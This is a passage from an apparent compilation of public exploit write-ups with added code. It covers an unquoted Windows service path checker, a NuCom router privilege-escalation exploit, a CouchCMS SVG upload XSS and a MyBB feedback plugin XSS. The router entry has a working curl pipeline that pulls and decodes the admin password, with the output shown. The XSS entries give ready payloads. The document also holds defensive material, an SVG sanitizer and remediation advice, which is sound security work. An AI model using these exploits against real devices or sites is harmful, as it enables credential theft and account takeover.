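    info["candidates"] = hijack_candidates(info["path"] or "")
    # Worth chasing only if a prefix can be hijacked AND the service runs privileged;
    # writability of the candidate directories must still be checked on the host.
    info["vulnerable"] = bool(info["candidates"]) and info["account"] == "LocalSystem"
    return info


# Constructed inputs: the Pingzapper (Spanish locale) and bVPN listings from this page
PINGZAPPER_SC = r"""
C:\>sc qc PingzapperSvc
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: PingzapperSvc
        TIPO                  : 10  WIN32_OWN_PROCESS
        TIPO_INICIO           : 2   AUTO_START
        NOMBRE_RUTA_BINARIO   : C:\Program Files (x86)\Pingzapper\PZService.exe
        NOMBRE_INICIO_SERVICIO: LocalSystem
"""

BVPN_SC = r"""
SERVICE_NAME: waselvpnserv
        BINARY_PATH_NAME   : C:/Program Files (x86)/bVPN Service/bVPN/waselvpnserv.exe
        SERVICE_START_NAME : LocalSystem
"""

# Constructed control case: same layout, but the installer quoted the path
QUOTED_SC = r"""
SERVICE_NAME: ExampleSvc
        BINARY_PATH_NAME   : "C:\Program Files\Example\svc.exe" -service
        SERVICE_START_NAME : LocalSystem
"""

if __name__ == "__main__":
    for listing in (PINGZAPPER_SC, BVPN_SC, QUOTED_SC):
        r = assess(listing)
        print(r["service"], r["account"], "VULNERABLE" if r["vulnerable"] else "ok")
        for c in r["candidates"]:
            print("   would try:", c)
```

Run on the Pingzapper listing this reports `C:\Program.exe` and `C:\Program Files.exe`; on bVPN it adds `C:/Program Files (x86)/bVPN.exe`, the only candidate in a directory a non-administrator might plausibly be able to write to. The fix on the vendor side is to quote `BINARY_PATH_NAME`; on an affected host, `sc config <name> binPath= "\"<full path>\""` does the same.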
23. # Exploit Title: NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation
# Date: 01.03.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.nucom.es

Vendor: NUEVAS COMUNICACIONES IBERIA, S.A.
Product web page: https://www.nucom.es
Affected version: 5.07.90_multi_NCM01
                  5.07.89_multi_NCM01
                  5.07.72_multi_NCM01

Summary: The NC routers upgrades your network to the next generation of WiFi. With combined wireless speeds of up to 1750 Mbps, the device provides better speeds and wireless range. Includes 2 FXS ports for any VoIP service. If you prefer a wired connection, the NC routers have gigabit ports to provide an incredibly fast, lag-free experience. 3.0 ports allow you to power a robust home Internet network by sharing printers, flash storage, FTP servers, or media players.

Desc: The application suffers from a privilege escalation vulnerability. The non-privileged default user (user:user) can elevate his/her privileges by sending a HTTP GET request to the configuration backup endpoint and disclose the http super password (admin credentials) in Base64 encoded value. Once authenticated as admin, an attacker will be granted access to the additional and privileged pages.

Tested on: GoAhead-Webs
           Tenda

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5629
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5629.php

01.03.2021

--

lqwrm@metalgear:~/prive$ echo -e '\nThe admin password is: ' ; \
> curl -s http://192.168.0.1:8080/cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg?random=0.251 \
> -H 'Cookie: ecos_pw=dXNlcg==1311930653:language=en' | \
> grep -oP '(?<=http_supper_passwd=).*' | \
> base64 -d 2>/dev/null | \
> xargs echo -n ; \
> echo -e '\n-----------\n'

The admin password is:
MammaMia123
-----------

lqwrm@metalgear:~/prive$
24. # Exploit Title: CouchCMS 2.2.1 - XSS via SVG file upload
# Date: 2021-01-25
# Exploit Author: xxcdd
# Vendor Homepage: https://github.com/CouchCMS/CouchCMS
# Software Link: https://github.com/CouchCMS/CouchCMS
# Version: v2.2.1
# Tested on: Windows 7

An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows XSS via a /couch/includes/kcfinder/browse.php SVG upload.

upload url is: /couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en
(e.g. http://127.0.0.1/couch/includes/kcfinder/browse.php?nonce=02b16f710f786c61f34e301eae552bdf&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en)

xss.svg content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.cookie);
  </script>
</svg>
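The post shows the payload but not what an upload handler would have to look for to stop it. The following is an added example, not part of the CouchCMS post or of the project's code, of a server-side SVG check: it parses the upload as XML and rejects `<script>` and `<foreignObject>` elements, `on*` event-handler attributes and `javascript:` hrefs. The page's own xss.svg is used as constructed input alongside two further constructed samples (a clean triangle and an `onload` variant). Python's stdlib `xml.etree` is used so the example runs offline; it does not defend against entity-expansion attacks, so a production handler should parse with `defusedxml` instead.

```python
# Added example (not from the original post): reject SVG uploads that carry script.
import xml.etree.ElementTree as ET

BLOCKED_TAGS = {"script", "foreignObject"}     # foreignObject can wrap arbitrary HTML
BLOCKED_SCHEMES = ("javascript:",)


def _local(name):
    """'{namespace}tag' -> 'tag'; also strips the xlink namespace from attributes."""
    return name.rsplit("}", 1)[-1]


def svg_findings(data):
    """Return the list of reasons to reject the file; an empty list means accept."""
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return ["not well-formed XML: %s" % exc]
    if _local(root.tag) != "svg":
        findings.append("root element is <%s>, not <svg>" % _local(root.tag))
    for el in root.iter():                     # includes the root itself
        tag = _local(el.tag)
        if tag in BLOCKED_TAGS:
            findings.append("<%s> element" % tag)
        for attr, value in el.attrib.items():
            name = _local(attr).lower()
            if name.startswith("on"):          # onload, onclick, onmouseover, ...
                findings.append("event handler attribute %s on <%s>" % (name, tag))
            if name == "href" and value.strip().lower().startswith(BLOCKED_SCHEMES):
                findings.append("javascript href on <%s>" % tag)
    return findings


def svg_is_safe(data):
    return not svg_findings(data)


# Constructed input 1: the xss.svg from the post
XSS_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.cookie);
  </script>
</svg>"""

# Constructed input 2: the same drawing with the script removed
CLEAN_SVG = b"""<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>"""

# Constructed input 3: no <script> element, but an event handler and a javascript: link
ONLOAD_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     onload="alert(1)">
  <a xlink:href="javascript:alert(2)"><text x="10" y="20">click</text></a>
</svg>"""


if __name__ == "__main__":
    for label, sample in (("xss.svg", XSS_SVG), ("clean", CLEAN_SVG), ("onload", ONLOAD_SVG)):
        print(label, "->", svg_findings(sample) or "accepted")
```

Filtering the content only narrows the problem: a file that passes today is still a same-origin document that a browser will execute script from if it is ever served inline with `image/svg+xml`. The more robust fix is to serve user uploads with `Content-Disposition: attachment`, or from a separate origin, so that a missed vector cannot reach the application's cookies.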
25. # Exploit Title: MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting
# Date: 1/30/2021
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1220
# Version: 1.8.22
# Tested on: Windows 10
# CVE: CVE-2021-28115

1. Description:
This plugin adds a feedback system to your forum. The Edit feedback button is vulnerable to XSS.

2. Proof of Concept:
- Go to a user profile
- Add feedback and leave the following payload as comment "><script>alert(1)</script>
- View the feedback feedback.php?uid=2
- When clicking Edit the payload will execute